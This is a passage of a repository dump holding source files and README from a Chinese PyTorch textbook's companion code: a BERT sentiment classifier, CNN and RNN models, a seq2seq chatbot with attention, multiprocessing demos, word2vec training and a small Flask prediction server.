#Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters\n max_lr=3e-5,#学习率\n epochs=5,\n use_fp16=False, #fastai里可以方便地调整精度,加快训练速度:learner.to_fp16()\n bs=8,#batch size\n max_seq_len=128, #选取合适的seq_length,较大的值可能导致训练极慢报错等\n)\n\nfrom pytorch_pretrained_bert import BertTokenizer\nbert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\")\n\n#使用Bert分词器分词的适配器\nclass FastAiBertTokenizerAdapter(BaseTokenizer):\n \"\"\"包装BertTokenizer为FastAI中的BaseTokenizer\"\"\"\n def __init__(self, tokenizer: BertTokenizer, max_seq_len: int=128, **kwargs):\n self._pretrained_tokenizer = tokenizer\n self.max_seq_len = max_seq_len\n def __call__(self, *args, **kwargs):\n return self\n def tokenizer(self, t:str) -> List[str]:\n \"\"\"限制最大序列长度,使用Bert中的分词器将传入的序列进行分词,并在首位分别加上[CLS][SEP]标记\"\"\"\n return [\"[CLS]\"] + self._pretrained_tokenizer.tokenize(t)[:self.max_seq_len - 2] + [\"[SEP]\"]\n\n#创建FastAI分词器实例,由分词器和规则组成,默认为SpacyTokenizer,SpacyTokenizer只支持英文,因此无法用于处理中文\nfastai_tokenizer = Tokenizer(\n tok_func=FastAiBertTokenizerAdapter(bert_tokenizer, max_seq_len=config.max_seq_len), \n pre_rules=[], \n post_rules=[]\n)\n\n#设置FastAI Vocab\nfastai_vocab = Vocab(list(bert_tokenizer.vocab.keys()))\n\nimport pandas as pd\ndf_train = pd.read_csv(\"./datas/train.csv\",encoding='utf-8')\ndf_test = pd.read_csv(\"./datas/test.csv\",encoding='utf-8')\n#标签涵义:1代表正向评论,0代表负向评论\nlabel_denotation = {1:'pos',0:'neg'}\ndf_train['label'] = df_train[\"label\"].map(lambda x:0 if x=='neg' else 1)\nfrom sklearn.model_selection import train_test_split\n\ndf_train, df_val = train_test_split(df_train,test_size=0.2,random_state=10)\n\ndf_test['label'] = df_test[\"label\"].map(lambda x:0 if x=='neg' else 1)\n\n\ndef get_databunch():\n #建立TextDataBunch \n databunch = TextClasDataBunch.from_df(\".\", df_train, df_val,df_test,\n tokenizer=fastai_tokenizer,\n vocab=fastai_vocab,\n include_bos=False,\n include_eos=False,\n text_cols=\"sentence\",\n label_cols='label',\n bs=config.bs,\n collate_fn=partial(pad_collate, pad_first=False, pad_idx=0),\n pin_memory=True,\n num_workers = 1,\n device=torch.device(\"cpu\")\n ) \n return databunch\n\ndef get_model():\n #model\n from pytorch_pretrained_bert.modeling import BertConfig, BertForSequenceClassification\n bert_model = BertForSequenceClassification.from_pretrained(config.bert_model_name, num_labels=2).cpu()\n return bert_model\n\n\ndef get_loss_fun():\n #损失函数:二分类问题选用CrossEntrypyLoss作为损失函数\n loss_func = nn.CrossEntropyLoss()\n return loss_func\n \ndef get_metrics():\n return [accuracy,AUROC(),error_rate]\n\ndef get_learner():\n databunch = get_databunch()\n bert_model = get_model()\n loss_func = get_loss_fun()\n #建立Learner(数据,预训练模型,损失函数)\n learner = Learner(databunch, bert_model,loss_func=loss_func,metrics=get_metrics())\n return learner\n\ndef train():\n learner = get_learner()\n #尝试寻找合适的最大学习率,这里使用了BERT原论文推荐的学习率3e-5作为默认值\n #learner.lr_find()\n #learner.recorder.plot(skip_end=20)\n #开始训练\n learner.fit_one_cycle(config.epochs, max_lr=config.max_lr)\n #模型保存\n learner.save('./fastai_bert_chinese_classification') \n\ndef predict_learner():\n learner = get_learner()\n learner.load(\"./fastai_bert_chinese_classification\")\n return learner\n \n\nif __name__ == \"__main__\":\n #建立Learner(数据,预训练模型,损失函数)\n learner = get_learner()\n learner.load(\"./fastai_bert_chinese_classification\") \n #用样例测试下\n result = learner.predict(\"房间稍小,交通不便,专车往返酒店与浦东机场,车程10分钟,但是经常满员,不得不站在车里\")\n print(\"predict result:{}\".format(result))\n #在整个测试集上进行测试\n #tf_test_sentences = 
df_test[\"sentence\"].values\n #df_test_labels = df_test[\"label\"].values\n #import numpy as np\n #predict_labels = []\n #for sentence in tf_test_sentences:\n # result = learner.predict(sentence)\n # label = result[1].item()\n # predict_labels.append(label)\n #correct = np.sum(df_test_labels==np.array(predict_labels))\n #acc = correct / df_test_labels.size\n #print(\"accuracy:{}\".format(acc))\n #accuracy:0.926\n \n" }, { "alpha_fraction": 0.4929797053337097, "alphanum_fraction": 0.5546022057533264, "avg_line_length": 33.64864730834961, "blob_id": "8418d95f6789c443f5c3577ea8a503c0c711bef1", "content_id": "57e68a7a2bdba4a9b5e154afa22217947fea917e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1282, "license_type": "no_license", "max_line_length": 67, "num_lines": 37, "path": "/chapter4/CNN/model.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CNN_Net(nn.Module):\n def __init__(self):\n super(CNN_Net,self).__init__()\n self.conv1 = nn.Conv2d(1, 8, kernel_size=7)\n self.conv2 = nn.Conv2d(8, 32, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(288, 100)\n self.fc2 = nn.Linear(100, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 288)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return F.log_softmax(x, dim=1)\n \n \nclass CNN_Dilation_Net(nn.Module):\n def __init__(self):\n super(CNN_Dilation_Net,self).__init__()\n self.conv1 = nn.Conv2d(1, 8, kernel_size=7,dilation=2)\n self.conv2 = nn.Conv2d(8, 32, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(128, 50)\n self.fc2 = nn.Linear(50, 10)\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 128)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return F.log_softmax(x, dim=1)\n" }, { "alpha_fraction": 0.5835475325584412, "alphanum_fraction": 0.5938303470611572, "avg_line_length": 25.272727966308594, "blob_id": "0a93b2b0e5fb8cb8e34ea7c75452cd5821b55a5a", "content_id": "3f84a4951073bf31db835c6ad4154243cf9b8cb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1217, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/chapter3/multiprocess/多进程训练模型.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport torch.multiprocessing as mp\nimport torch\nimport random \nfrom train import train\n\nclass LinearRegression(torch.nn.Module):\n def __init__(self):\n super(LinearRegression,self).__init__()\n #输入输出都是一维\n self.linear = torch.nn.Linear(1,1)\n def forward(self,x):\n return self.linear(x)\n\n\nif __name__ == \"__main__\":\n mp.set_start_method('spawn')\n x = np.arange(20)\n y = np.array([5*x[i]+random.randint(1,20) for i in range(len(x))])\n x_train = torch.from_numpy(x).float()\n y_train = torch.from_numpy(y).float() \n \n #新建模型,误差函数,优化器\n model = LinearRegression()\n model.share_memory()\n \n processes = []\n for rank in range(10):\n p = mp.Process(target=train, args=(x_train,y_train,model))\n p.start()\n processes.append(p)\n for p in processes:\n p.join() \n \n #预测一波 \n input_data = 
x_train.unsqueeze(1)\n predict = model(input_data)\n plt.xlabel(\"X\")\n plt.ylabel(\"Y\") \n plt.plot(x_train.data.numpy(),predict.squeeze(1).data.numpy(),\"r\")\n plt.scatter(x_train,y_train)\n \n plt.show()\n \n \n\n\n" }, { "alpha_fraction": 0.6095317602157593, "alphanum_fraction": 0.6145485043525696, "avg_line_length": 24.46808433532715, "blob_id": "50aa8dc5fdfd7f5be3635941f469a578d339ee8c", "content_id": "53e52c6a4ae5eeb9d5fab6b1b088491e89e6f7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "no_license", "max_line_length": 62, "num_lines": 47, "path": "/chapter10/PBG/data_split.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport random\n\n\nDATA_PATH = \"datas/soc-LiveJournal/soc-LiveJournal-sample.txt\"\nFILENAMES = {\n 'train': 'train.txt',\n 'test': 'test.txt',\n}\nTRAIN_FRACTION = 0.8\nTEST_FRACTION = 0.2\n\ndef random_split_file(fpath):\n root = os.path.dirname(fpath)\n\n output_paths = [\n os.path.join(root, FILENAMES['train']),\n os.path.join(root, FILENAMES['test']),\n ]\n if all(os.path.exists(path) for path in output_paths):\n print(\"训练及测试文件已经存在,不再生成测试训练文件...\")\n return\n\n #读取数据,并随机打乱,划分出训练数据集测试数据\n train_file = os.path.join(root, FILENAMES['train'])\n test_file = os.path.join(root, FILENAMES['test'])\n #读取数据\n with open(fpath, \"rt\") as in_tf:\n lines = in_tf.readlines()\n\n #调过soc-LiveJournal.txt文件头部的4行注解\n lines = lines[4:]\n #shuffle打乱数据\n random.shuffle(lines)\n split_len = int(len(lines) * TRAIN_FRACTION)\n #写入测试及训练文件\n with open(train_file, \"wt\") as out_tf_train:\n for line in lines[:split_len]:\n out_tf_train.write(line)\n\n with open(test_file, \"wt\") as out_tf_test:\n for line in lines[split_len:]:\n out_tf_test.write(line)\n\n\nif __name__==\"__main__\":\n random_split_file(DATA_PATH)" }, { "alpha_fraction": 0.7105262875556946, "alphanum_fraction": 0.7631579041481018, "avg_line_length": 33.20000076293945, "blob_id": "34fbfb137478c3173fbc9ed10ba43130e27353a4", "content_id": "5f2f23a19b69e3f73c19de68e5617291a43df1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 86, "num_lines": 10, "path": "/chapter6/word2vec.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import gensim\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\nnews = open('./datas/Corpus_utf8.txt', 'r',encoding='utf8')\nmodel = Word2Vec(LineSentence(news), sg=0,size=200, window=5, min_count=5, workers=12)\nmodel.save(\"news.word2vec\")\n\nmodel = gensim.models.KeyedVectors.load(\"news.word2vec\")\n\nprint(123)\n" }, { "alpha_fraction": 0.6433432698249817, "alphanum_fraction": 0.6475967764854431, "avg_line_length": 44.65048599243164, "blob_id": "ffc8c920c63c367d6a3c68e669ac941de2dce8ae", "content_id": "ccbdb781d69899a7598924a100f970ef016481d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4862, "license_type": "no_license", "max_line_length": 136, "num_lines": 103, "path": "/chapter6/robot/model.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import 
pack_padded_sequence,pad_packed_sequence\n\nclass EncoderRNN(nn.Module):\n    def __init__(self, opts, voc_length):\n        super(EncoderRNN, self).__init__()\n        self.num_layers = opts.num_layers\n        self.hidden_size = opts.hidden_size\n        self.embedding = nn.Embedding(voc_length, opts.embedding_dim)\n        #双向GRU作为Encoder\n        self.gru = nn.GRU(opts.embedding_dim, self.hidden_size, self.num_layers,dropout= opts.dropout, bidirectional=opts.bidirectional)\n    def forward(self, input_seq, input_lengths, hidden=None):\n        \"\"\"\n        input_seq:[max_seq_length,batch_size]\n        input_lengths:the lengths in batches\n        \"\"\"\n        embedded = self.embedding(input_seq) \n        #packed data shape:[all_words_size_in_batch,embedding_size]\n        packed = pack_padded_sequence(embedded, input_lengths)\n        #outputs data shape:[all_words_size_in_batch,num_layer*hidden_size] \n        #hidden shape:[num_layer*bidirection,batch_size,hidden_size]\n        outputs, hidden = self.gru(packed, hidden)\n        #outputs shape:[max_seq_length,batch_size,num_layer*hidden_size]\n        outputs, _ = pad_packed_sequence(outputs)\n        #将双向的outputs求和\n        outputs = outputs[:, :, :self.hidden_size] + outputs[:, : ,self.hidden_size:]\n        return outputs, hidden\n\n\nclass Attention(torch.nn.Module):\n    def __init__(self, attn_method, hidden_size):\n        super(Attention, self).__init__()\n        #Attention的方式:dot和general\n        self.method = attn_method \n        self.hidden_size = hidden_size\n        if self.method not in ['dot', 'general']:\n            raise ValueError(self.method, \"is not an appropriate attention method.\")\n        if self.method == 'general':\n            self.attn = torch.nn.Linear(self.hidden_size, self.hidden_size)\n    #dot方式\n    def dot_score(self, hidden, encoder_outputs):\n        \"\"\"\n        hidden shape:[1,batch_size,hidden_size]\n        encoder_outputs shape:[max_seq_length,batch_size,hidden_size]\n        result shape:[max_seq_length,batch_size]\n        \"\"\"\n        return torch.sum(hidden * encoder_outputs, dim=2)\n    #general方式\n    def general_score(self, hidden, encoder_outputs):\n        energy = self.attn(encoder_outputs)\n        return torch.sum(hidden * energy, dim=2)\n    #前向传播\n    def forward(self, hidden, encoder_outputs):\n        if self.method == 'general':\n            attn_energies = self.general_score(hidden, encoder_outputs)\n        elif self.method == 'dot':\n            attn_energies = self.dot_score(hidden, encoder_outputs)\n        attn_energies = attn_energies.t()#[batch_size,max_seq_length]\n        return F.softmax(attn_energies, dim=1).unsqueeze(1)#[batch_size,1,max_seq_length]\n\nclass AttentionDecoderRNN(nn.Module):\n    def __init__(self, opts, voc_length):\n        super(AttentionDecoderRNN, self).__init__()\n        self.attn_method = opts.method\n        self.hidden_size = opts.hidden_size\n        self.output_size = voc_length\n        self.num_layers = opts.num_layers\n        self.dropout = opts.dropout\n        self.embedding = nn.Embedding(voc_length, opts.embedding_dim)\n        self.embedding_dropout = nn.Dropout(self.dropout)\n        self.gru=nn.GRU(opts.embedding_dim,self.hidden_size,self.num_layers, dropout = self.dropout )\n        self.concat = nn.Linear(self.hidden_size * 2, self.hidden_size)\n        self.out = nn.Linear(self.hidden_size, self.output_size)\n        self.attention = Attention(self.attn_method, self.hidden_size)\n\n    def forward(self, input_step, last_hidden, encoder_outputs):\n        \"\"\"\n        input_step shape:[1,batch_size]\n        embedded shape:[1,batch_size,embedding_size]\n        \n        \"\"\"\n        embedded = self.embedding(input_step) \n        embedded = self.embedding_dropout(embedded)\n        #rnn_output shape:[1,batch_size,hidden_size]\n        #hidden shape:[num_layer*bidirection,batch_size,hidden_size]\n        rnn_output, hidden = self.gru(embedded, last_hidden)\n        
#注意力权重#[batch_size,1,max_seq_length]\n        attn_weights = self.attention(rnn_output, encoder_outputs)\n        #由注意力权重通过bmm批量矩阵相乘计算出此时rnn_output对应的注意力Context\n        #context shape:[batch_size,1,hidden_size]\n        context = attn_weights.bmm(encoder_outputs.transpose(0, 1))\n        rnn_output = rnn_output.squeeze(0)\n        context = context.squeeze(1)\n        #上下文和rnn_out拼接\n        concat_input = torch.cat((rnn_output, context), 1)\n        #使用tanh非线性函数将值范围变成[-1,1]\n        concat_output = torch.tanh(self.concat(concat_input)) \n        output = self.out(concat_output)\n        #Softmax函数计算output的得分值\n        output = F.softmax(output, dim=1)\n        return output, hidden\n" }, { "alpha_fraction": 0.6492776870727539, "alphanum_fraction": 0.675762414932251, "avg_line_length": 30.125, "blob_id": "14054069e2daf9551c937529dec6b70ae1b4d375", "content_id": "92e439f00d7c86a617cdcf3cc84a0e0e0623958b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1374, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/chapter5/RNN/RNNCell.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nclass RNNCell(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size,batch_size):\n        super(RNNCell, self).__init__()\n        self.batch_size = batch_size\n        self.hidden_size = hidden_size\n        self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n        self.i2o = nn.Linear(input_size + hidden_size, output_size)\n        self.softmax = nn.LogSoftmax(dim=1)\n\n    def forward(self, input, hidden):\n        combined = torch.cat((input, hidden), 1)\n        hidden = self.i2h(combined)\n        output = self.i2o(combined)\n        output = self.softmax(output)\n        return output, hidden\n    \n    def initHidden(self):\n        return torch.zeros(self.batch_size, self.hidden_size)\n    \n#隐藏层神经元个数\nn_hidden = 10\n#分类类别数\ntarget_size = 2\n#输入长度,以英文字符为例,英文字符个数为26\ninput_size=26\n#batch_size\nbatch_size=64\n#实例化RNN\nrnnCell = RNNCell(input_size, n_hidden, target_size,batch_size)\n#初始化隐藏状态,初始为0\nhidden = rnnCell.initHidden()\n#构造输入,随机生成0到9的整数,形状为[64,26]\ninput = torch.randint(0,10,(batch_size,input_size)).float()\nprint(input)\nprint(input.shape)\noutput, next_hidden = rnnCell(input, hidden)#得到output:[64,2],next_hidden:[64,10]\nprint(output.data.size(),next_hidden.data.size())\n\n" }, { "alpha_fraction": 0.617977499961853, "alphanum_fraction": 0.6266205906867981, "avg_line_length": 37.56666564941406, "blob_id": "2af160cd7636ea725bd1357d0a6c5181c1ec85a8", "content_id": "acf2294d97075ee01657f219e34591b149db27fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 144, "num_lines": 30, "path": "/chapter9/server.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import flask\nfrom gevent import pywsgi\nimport json\nfrom fastai_bert_classification import predict_learner\nfrom flask import Flask,request,render_template\n#实例化出server对象\nserver=flask.Flask(__name__) \ndef response_wrapper(keep_dict = False,**kargs):\n    \"\"\"\n    将字典类型包装成json\n    params: keep_dict: Whether or not keep dict type\n    \"\"\"\n    return kargs if(keep_dict) else json.dumps(kargs,ensure_ascii=False)\n\nif __name__ == \"__main__\":\n    learner = predict_learner()\n    @server.route('/fastai_bert_classification/predict',methods=['post','get'])\n    def preview_file_():\n        try:\n            if request.method == 'GET':\n                return render_template('input.html')\n            
else: \n                message = flask.request.values.get('message') \n                result = learner.predict(message)\n                return response_wrapper(category_label=result[1].item(),neg_probability=result[2][0].item(),pos_probability=result[2][1].item())\n        except Exception as e:\n            print(e)\n            return e.args[0].__str__()\n    wsgi_server = pywsgi.WSGIServer((\"localhost\", 1314), server)\n    wsgi_server.serve_forever() " }, { "alpha_fraction": 0.5975469350814819, "alphanum_fraction": 0.6025297045707703, "avg_line_length": 33.733333587646484, "blob_id": "763617444753c95dd71329ec26037fd227eaf9a2", "content_id": "e16dca752d5badc01f8d826bee10ff8498952e5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2667, "license_type": "no_license", "max_line_length": 88, "num_lines": 75, "path": "/chapter6/robot/loader.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport itertools\nfrom torch.utils.data import DataLoader,Dataset\nfrom torch.nn import functional as F\n\n\ndef create_collate_fn(padding, eos):\n    def collate_fn(corpus_item):\n        #按照inputQue的长度进行排序,是调用pack_padded_sequence方法的要求\n        corpus_item.sort(key=lambda p: len(p[0]), reverse=True) \n        inputs, targets, indexes = zip(*corpus_item)\n        input_lengths = torch.tensor([len(line) for line in inputs])\n        inputs = zeroPadding(inputs, padding)\n        #词嵌入需要使用Long类型的Tensor\n        inputs = torch.LongTensor(inputs)\n        max_target_length = max([len(line) for line in targets])\n        targets = zeroPadding(targets, padding)\n        mask = binaryMatrix(targets, padding)\n        mask = torch.ByteTensor(mask)\n        targets = torch.LongTensor(targets)\n        return inputs, targets, mask, input_lengths, max_target_length, indexes\n    return collate_fn\n\ndef zeroPadding(datas, fillvalue):\n    return list(itertools.zip_longest(*datas, fillvalue=fillvalue))\n\ndef binaryMatrix(datas, padding):\n    m = []\n    for i, seq in enumerate(datas):\n        m.append([])\n        for token in seq:\n            if token == padding:\n                m[i].append(0)\n            else:\n                m[i].append(1)\n    return m\n\n\nclass CorpusDataset(Dataset):\n    def __init__(self, opts):\n        self.opts = opts\n        self.datas = torch.load(opts.corpus_data_path)\n        self.word2ix = self.datas['word2ix']\n        self.ix2word = self.datas['ix2word']\n        self.corpus = self.datas['corpus']\n        self.padding = self.word2ix.get(self.datas.get('padding'))\n        self.eos = self.word2ix.get(self.datas.get('eos'))\n        self.sos = self.word2ix.get(self.datas.get('sos'))\n        self.unknown = self.word2ix.get(self.datas.get('unknown'))\n    def __getitem__(self, index):\n        #问\n        inputQue = self.corpus[index][0]\n        #答\n        targetAns = self.corpus[index][1]\n        return inputQue,targetAns, index\n    def __len__(self):\n        return len(self.corpus)\n\ndef get_loader(opts):\n    dataset = CorpusDataset(opts)\n    dataloader = DataLoader( dataset,\n                batch_size=opts.batch_size,\n                shuffle=opts.shuffle,\n                num_workers=opts.num_workers, \n                drop_last=opts.drop_last,\n                collate_fn=create_collate_fn(dataset.padding, dataset.eos),\n                pin_memory=opts.pin_memory)\n    return dataloader,dataset\n\n\n#dataloader,dataset = get_loader(opts)\n\n#for i in dataloader:\n#    print(i)\n\n\n\n\n" }, { "alpha_fraction": 0.4535050094127655, "alphanum_fraction": 0.4721029996871948, "avg_line_length": 19.58823585510254, "blob_id": "112f9d869f73f2af811c0e9ca7122f08b80338a8", "content_id": "a3e6fd4bd5a58d735ee4a066b29e75ea683e54e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", 
"max_line_length": 45, "num_lines": 34, "path": "/chapter10/PBG/config.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "#实体节点路径\nentities_base = 'datas/soc-LiveJournal'\n#获取PBG的配置\ndef get_torchbiggraph_config():\n config = dict(\n #实体路径及模型检查点路径\n entity_path=entities_base,\n edge_paths=[],\n checkpoint_path='model/demo',\n #图结构及分区数\n entities={\n 'user_id': {'num_partitions': 2},\n },\n #关系类型及左右实体节点\n relations=[{\n 'name': 'follow',\n 'lhs': 'user_id',\n 'rhs': 'user_id',\n 'operator': 'none',\n }],\n\n #嵌入维度\n dimension=520,\n global_emb=False,\n\n #训练10个epoch\n num_epochs=10,\n #学习率\n lr=0.001,\n # Misc\n hogwild_delay=2,\n )\n\n return config" }, { "alpha_fraction": 0.5962733030319214, "alphanum_fraction": 0.6024844646453857, "avg_line_length": 22.88888931274414, "blob_id": "4c4f459dc84b511b9664e65fdbae96682c328aed", "content_id": "cbac214e34fda13fa5778634cbdf33ec19982971", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 794, "license_type": "no_license", "max_line_length": 69, "num_lines": 27, "path": "/chapter3/多进程.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.multiprocessing as mp\nimport os\ndef foo(q): #传递队列对象给函数\n pid = os.getpid()\n q.put('my pid is:{}'.format(pid))\n print(pid)\n\nif __name__ == '__main__':\n #设置启动进程方式,windows下默认为spawn,linux下为fork\n mp.set_start_method('spawn') \n #创建队列对象\n q = mp.Queue() \n ps = []\n #创建10个进程,传递运行函数和参数\n [ps.append(mp.Process(target=foo, args=(q,))) for i in range(10)]\n #启动进程\n [p.start() for p in ps]\n #join方法让主线程阻塞,等待子线程执行完成再执行\n [p.join() for p in ps]\n #获取队列数据\n data = q.get()\n while(data):\n print(data)\n data = q.get()" }, { "alpha_fraction": 0.3604843020439148, "alphanum_fraction": 0.5839295387268066, "avg_line_length": 21.331966400146484, "blob_id": "732a63d001a2fabc392c0c4e1201f1da6ce9e74c", "content_id": "7291d22d9d76136f61d238c833526b89bc5b5e9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7912, "license_type": "no_license", "max_line_length": 47, "num_lines": 244, "path": "/README.md", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### Learn-Pytorch-And-Become-A-Data-Scientist\n### 《学好Pytorch成为数据科学家》书籍代码\n### 请扫描关注,图书微信公众号。\n![avatar](gongzhonghao.jpg)\n### 图书目录\n```\n第1章 初识Pytorch\t11\n```\n- 1.1 AI发展简史\t12\n - 1.1.1 神经网络的前世今生\t12\n - 1.1.2 深度学习框架对比\t13\n- 1.2 环境安装\t16\n - 1.2.1 Python版本选择及安装\t16\n - 1.2.2 安装Pytorch1.2稳定版\t18\n - 1.2.3 开发环境IDE\t19\n- 1.3 Pytorch核心概念\t20\n - 1.3.1基本概念\t20\n - 1.3.2自动微分\t24\n - 1.3.3 Pytorch核心模块\t26\n- 1.4 实验室小试牛刀\t27\n - 1.4.1塔珀自指公式\t27\n - 1.4.2看看你毕业了能拿多少\t28\n- 1.5 课后加油站高等数学知识回顾\t43\n - 1.5.1 函数与导数\t43\n - 1.5.2 偏导数及梯度\t47\n```\n第2章 机器学习基础及常见概念\t50\n```\n- 2.1 机器学习的分类\t51\n - 2.1.1 监督学习\t51\n - 2.1.2 半监督学习\t52\n - 2.1.3 无监督学习\t52\n - 2.1.4 强化学习\t53\n- 2.2 机器学习常见概念\t54\n - 2.2.1 缺失值处理\t54\n - 2.2.2 数据标准化与正则化\t56\n - 2.2.3 交叉验证\t58\n - 2.2.4 过拟合和欠拟合\t60\n- 2.3 神经网络\t61\n - 2.3.1 神经网络的生理学发现与编程模拟\t61\n - 2.3.2 人工神经网络的核心思想\t67\n - 2.3.3 人工神经网络与逻辑斯蒂之间的关联\t68\n- 2.4实现线性回归和逻辑回归\t68\n - 2.4.1 Pytorch实现线性回归\t68\n - 2.4.2 Pytorch实现多项式回归\t70\n - 2.4.3 Pytorch实现类逻辑回归\t73\n- 2.5 加油站高等数学知识回顾\t77\n - 2.5.1 方向导数和梯度\t77\n - 2.5.2 微分及积分\t79\n - 2.5.3 牛顿-莱布尼兹公式\t82\n```\n第3章 Pytorch与科学计算\t83\n```\n- 3.1 
算子字典\t83\n - 3.1.1 基本方法\t83\n - 3.1.2 索引·切片·连接·换位\t85\n - 3.1.3 随机抽样\t89\n - 3.1.4 数据持久化与高并发\t90\n - 3.1.5 元素级别数学计算\t91\n - 3.1.6 规约计算\t94\n - 3.1.7 数值比较运算\t96\n - 3.1.8 矩阵运算\t98\n- 3.2 广播机制\t101\n - 3.2.1 自动广播规则\t101\n - 3.2.2 广播结果结算规则\t102\n- 3.3 GPU及并行编程\t103\n - 3.3.1 device和cuda基本用法\t103\n - 3.3.2 CPU到GPU\t104\n - 3.3.3 固定缓冲区\t106\n - 3.3.4 自动设备感知\t107\n - 3.3.5 并发编程\t108\n- 3.4 实验室小试牛刀之轻松搞定图片分类\t110\n - 3.4.1 Softmax分类简介\t113\n - 3.4.2 定义网络结构\t115\n- 3.5 加油站高等数学知识回顾\t120\n - 3.5.1 泰勒公式及思想\t121\n - 3.5.2 拉格朗日乘子法及思想\t124\n```\n第4章 激活函数、损失函数、优化器及数据加载\t125\n``` \n- 4.1 激活函数\t126\n - 4.1.1 Sigmoid\t126\n - 4.1.2 Tanh\t128\n - 4.1.3 Relu及其变形\t129\n - 4.1.4 MaxOut\t132\n- 4.2 损失函数\t133\n - 4.2.1 L1范数损失\t134\n - 4.2.2 MSE均方误差损失\t134\n - 4.2.3 BCE二分类交叉熵损失\t135 \n - 4.2.4 CrossEntropyLoss和NLLLoss计算交叉熵损失\t135\n - 4.2.5 KL散度损失\t136\n - 4.2.6 余弦相似度损失\t137\n - 4.2.7 多分类多标签损失\t138\n- 4.3 优化器\t139\n - 4.3.1 BGD\t139\n - 4.3.2 SGD\t139\n - 4.3.3 MBGD\t140\n - 4.3.4 Momentum\t141\n - 4.3.5 NAG\t142\n - 4.3.6 Adagrad\t143\n - 4.3.7 Adadelta\t143\n - 4.3.8 Adam\t144\n- 4.4 数据加载\t145\n - 4.4.1 Dataset数据集\t145\n - 4.4.2 DataLoader数据加载\t148\n- 4.5 初探卷积神经网络\t149\n - 4.5.1 知识科普:卷积过程及物理意义\t149\n - 4.5.2 卷积神经网络CNN\t153\n - 4.5.3 stride和padding\t158\n - 4.5.4 膨胀卷积神经网络\t159\n - 4.5.5 Pooling池化\t161\n- 4.6 实验室小试牛刀\t164\n - 4.6.1 设计卷积神经网络\t164\n - 4.6.2 定义卷积网络\t164\n - 4.6.3 训练模型\t165\n - 4.6.4 理解CNN在学什么\t168\n```\n第5章 Pytorch深度神经网络\t177\n```\n- 5.1 计算机视觉工具包\t177\n- 5.2 训练过程的可视化\t179\n - 5.2.1 Tensorboard\t179\n - 5.2.2 Visdom\t184\n- 5.3 深度神经网络\t186\n - 5.3.1 LeNet\t187 \n - 5.3.2 AlexNet\t188\n - 5.3.3 ZF-Net\t190\n - 5.3.4 VGG-Nets\t191\n - 5.3.5 GoogLeNet\t194\n - 5.3.6 ResNet\t196\n - 5.3.7 DenseNet\t197\n- 5.4 RNN循环神经网络\t199\n - 5.4.1 RNN\t199\n - 5.4.2 LSTM\t203\n - 5.4.3 GRU\t207\n- 5.5 实验室小试牛刀\t209\n - 5.5.1 数据准备\t209\n - 5.5.2 GRU网络设计\t211\n - 5.5.3 训练模型\t212\n - 5.5.4 模型预测\t213\n- 5.6 